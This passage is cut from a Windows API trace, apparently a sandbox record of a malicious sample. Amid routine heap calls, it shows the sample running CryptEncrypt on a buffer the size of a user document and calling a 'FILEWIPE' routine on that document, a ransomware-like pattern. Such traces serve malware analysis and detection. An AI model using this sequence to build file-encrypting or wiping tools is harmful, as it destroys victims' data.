hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.322] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.322] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0178.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.323] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.323] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.323] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.323] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.323] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.324] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.324] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.324] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.324] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.325] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x9094, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x90a0) returned 1 [0178.325] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.325] CharLowerBuffW (in: lpsz="byte[37025]", cchLength=0xb | out: lpsz="byte[37025]") returned 0xb [0178.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.327] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc051f8*, pdwDataLen=0x87e820*=0x9094, dwBufLen=0x90a0 | out: pbData=0xc051f8*, pdwDataLen=0x87e820*=0x90a0) returned 1 [0178.330] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.343] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0178.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.343] CryptDestroyKey (hKey=0x90af18) returned 1 [0178.344] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.344] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.344] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0178.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.344] FreeLibrary (hLibModule=0x74f20000) returned 1 [0178.350] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0178.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x2d78f050, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="isuTz.pps", cAlternateFileName="")) returned 0x90ae18 [0178.351] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.351] CharLowerBuffW (in: lpsz="byte[37012]", cchLength=0xb | out: lpsz="byte[37012]") returned 0xb [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.353] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0178.353] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0178.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.353] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0178.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0178.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2898 [0178.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.354] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.356] FreeLibrary (hLibModule=0x75c90000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.357] 